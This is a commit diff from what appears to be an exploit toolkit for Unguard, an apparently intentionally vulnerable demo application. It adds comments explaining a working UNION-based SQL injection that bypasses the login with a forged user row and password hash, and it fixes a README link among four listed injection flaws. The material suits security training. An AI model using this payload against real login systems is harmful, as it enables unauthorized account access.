✨ feat(exploit-toolkit): Improve docs

Author: matthias-kranzer

exploit-toolkit/exploit.py

@@ -408,9 +408,11 @@ def sql_inject_login(target):
     """
     session = requests.session()
 
+    # create a fake query result from the user table with the ID 1 and the hashed password 'password'
     user_injection = "SELECT \"user\", \"$2a$10$MolvAKiEajLTuAN2HtaR/O.6h8wGhl3/UPn4WUCZ4sCAtbngzWgfy\", 1  FROM DUAL"
     password = "password"
 
+    # using SQL injection to ignore the real user query and use our prepared result instead
     sql_injection_username = "\" OR 1 = 0 UNION ALL " + user_injection + " #"
 
     user_data = {'username': sql_injection_username, 'password': password}

exploit-toolkit/exploits/sql-injection/README.md

@@ -5,4 +5,4 @@ Unguard has four SQL injection vulnerabilities:
 * [One in the Golang `status-service`](./SQLI-STATUS-SERVICE-MARIADB.md), which is exploitable through the search bar on the Users page and allows you to access the MariaDB database.
 * [One in the PHP `like-service`](./SQLI-LIKE-SERVICE-REMOVE-LIKE.md), which allows you to remove another user's like on a given post.
 * [One in the .NET `membership-service`](./SQLI-MEMBERSHIP-SERVICE-MARIADB.md), which allows you to add or change another user's membership state.
-* [One in the Node.js `user-auth-service`](./SQLI-MEMBERSHIP-SERVICE-MARIADB.md), which is exploitable through the search bar on the login page and allows you to access the MariaDB database.
+* [One in the Node.js `user-auth-service`](./SQLI-USER-AUTH-SERVICE-MARIADB.md), which is exploitable through the username field on the login page and allows you to access the MariaDB database.